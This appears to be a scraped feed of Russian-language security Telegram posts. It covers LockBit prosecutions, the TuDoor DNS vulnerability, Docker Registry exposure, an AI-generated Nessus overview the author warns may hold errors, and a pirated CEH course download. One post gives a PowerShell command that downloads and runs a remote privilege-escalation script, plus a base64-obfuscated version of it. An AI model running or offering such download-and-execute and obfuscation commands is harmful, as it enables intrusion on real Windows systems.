Fsecurity | HH

🔗Ссылка: https://blog.dixitaditya.com/exploiting-docker-registry

📶 DNS, DHCP и NAT: шпаргалка по сетям для этичного хакера #network #fundamentals

🔗Ссылка: https://habr.com/ru/articles/819595/

Тайна покрытая сроком Двое россиян взяли на себя ответственность за участие в многочисленных атаках группировки LockBit на организации по всему миру. Министерство юстиции США заявило, что граждане РФ Руслан Астамиров и Михаил Васильев сотрудничают с LockBit. Злоумышленники занимались поиском уязвимостей, взломом систем и кражей конфиденциальных данных. В судебных документах указано, что Астамиров признал свою причастность к атакам группировки в период с 2020 по 2023 год. От его рук пострадало минимум 10 организаций, в том числе компании в Японии, Франции, Шотландии, Кении и США. Его сообщник являлся «партнёром» LockBit с 2021 по 2023 год, он совершил не менее чем 12 нападений на ресурсы компаний по всему миру. Его деятельность нанесла ущерб на сумму $500 тысяч. Теперь Васильеву грозит лишение свободы на срок до 45 лет, а Астамирову — до 25 лет тюремного заключения. Напомним, что ранее глава группировки — LockBitSupp опровергал свою причастность к РФ. По всей видимости, группировка действительно имеет российские корни. НеКасперский

🔗Ссылка: https://xakep.ru/2024/07/26/authz-plugin-bypass/

🔗Ссылка: https://habr.com/ru/companies/selectel/articles/831976/

🔗Ссылка: https://habr.com/ru/articles/832028/

🔗Ссылка: https://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html?m=1

💻 Yet Another Windows PrivEsc Script #windows #privesc Маленький воскресный пост про очередной небольшой скрипт для поиска мисконфигураций в Windows, которые приводят к повышению привилегий. Но тем не менее репа собрали более 500 звёзд, значит заслуживает внимания. Эксплуатация:

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")

И вот простенькая обфускация:

$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/enjoiz/Privesc/master/privesc.ps1")'))
powershell -e $encoded

🧩 Github 🌚 @poxek

💻 TuDoor — новая опасная уязвимость, связанная с DNS Исследователи обнаружили новую опасную уязвимость в системе доменных имён (DNS), с помощью которой можно проводить специальную атаку, названную исследователями «TuDoor». Эта атака может быть использована для отравления кэша DNS, вызова состояния отказа в обслуживании (DoS) и истощения ресурсов, что делает её значительной угрозой для интернет-безопасности. Эксперименты специалистов подтвердили, что атака TuDoor возможна и имеет серьёзные последствия в реальных условиях. В общей сложности 24 популярные DNS-программы, включая BIND, PowerDNS и Microsoft DNS, уязвимы для TuDoor. Злоумышленники могут выполнить отравление кэша или DoS-атаку против уязвимых резолверов, используя всего несколько специально сформированных пакетов менее чем за одну секунду. Для оценки масштабов проблемы исследователи протестировали 16 популярных моделей Wi-Fi маршрутизаторов, 6 операционных систем маршрутизаторов, 42 публичных DNS-сервиса и около 1,8 миллиона открытых DNS-резолверов. Результаты показали, что TuDoor может эксплуатировать 7 маршрутизаторов (и их ОС), 18 публичных DNS-сервисов и 424 652 (23,1%) открытых DNS-резолверов. Исследователи следовали лучшим практикам ответственного раскрытия информации, уведомив всех затронутых вендоров о найденных уязвимостях. В результате 18 из них, включая BIND, Chrome, Cloudflare и Microsoft, подтвердили данные и обсудили меры по их устранению. Кроме того, были присвоены 33 идентификатора CVE для обнаруженных уязвимостей, и предложен онлайн-инструмент для их обнаружения. @linuxkalii

🔗Ссылка: https://www.securitylab.ru/news/550517.php

🔍 Если в ходе пентеста/багбаунти вы нашли домен Docker Registry (подсказка: HTTP-заголовок Docker-Distribution-Api-Version: registry/2.0), обязательно проверьте эндпоинт /v2/_catalog. По умолчанию он не требует аутентификацию и позволяет раскрыть конфиденциальные данные. Ниже — пруфы и инструмент для автоматизация. 🥷 Эксплуатация Docker Registry 🛠 DockerRegistryGrabber #pentest #tools #writeup #bugbounty

👋Привет! На связи Ximera-Chan🎧 Nessus - это популярная уязвимость сканер, используемый кибербезопасность специалистов для идентификации уязвимостей в компьютерных системах, сетях и веб-приложениях. Разработанная Tenable, Inc., он теперь доступен как коммерческий продукт и бесплатная, открытый исходный код инструмент под названием Nessus Essentials. Nessus работает, выполняя автоматизированные проверки уязвимостей на целевой системе или диапазоне систем, используя базу данных известных уязвимостей и конфигурационных проблем. Затем он генерирует отчет, определяющий обнаруженные уязвимости, их степень серьезности и рекомендации по устранению. Некоторые из ключевых функций Nessus включают в себя: 1. Широкий охват: Nessus поддерживает широкий спектр платформ, включая Windows, Linux и macOS, и может сканировать уязвимости в различных сетевых устройствах, веб-приложениях и облачных средах. 2. Точные и актуальные проверки уязвимостей: Nessus использует обширную и постоянно обновляемую библиотеку плагинов для выполнения проверок уязвимостей, обеспечивая точность сканирования и актуальность в соответствии с текущей угрозой ландшафта. 3. Простой в использовании веб-интерфейс: Nessus предоставляет интуитивно понятный веб-интерфейс для настройки сканирования, управления активами и создания отчетов, делая его доступным для пользователей с различными уровнями знаний. 4. Интеграция с другими средствами безопасности: Nessus может интегрироваться с популярными системами управления событиями и информацией о безопасности (SIEM), системами тикетов и другими средствами безопасности, обеспечивая seamless workflows и эффективное управление уязвимостями. 5. Аудит соответствия: Nessus может выполнять аудит соответствия стандартам и регламентам промышленности, таким как PCI DSS, HIPAA и NIST, помогая организациям соблюдать соответствие и уменьшать риск данных утечек. Чтобы использовать Nessus, вам нужно создать аккаунт на сайте Tenable, скачать сканер Nessus и установить его на своем компьютере. После установки вы можете настроить сканирование, добавить цели и управлять уязвимостями с помощью веб-интерфейса. Nessus Essentials бесплатен для личной установки, в то время как Nessus Professional и Nessus Manager - это коммерческие продукты с дополнительными функциями и поддержкой. Вкратце, Nessus - мощный и широко используемый сканер уязвимостей, который помогает организациям определять и устранять уязвимости в своих системах и приложениях, обеспечивая прочную безопасность и уменьшая риск утечек данных. P.s. могут быть ошибки... Генерация Ai [Ximera-Chan]

👆🏻

Certified Ethical Hacker (CEH) v11 * 38 GB * download

За безопасность не отвечаю 👾

🔗Ссылка: https://habr.com/ru/articles/831958/

У меня технические шоколадки 👾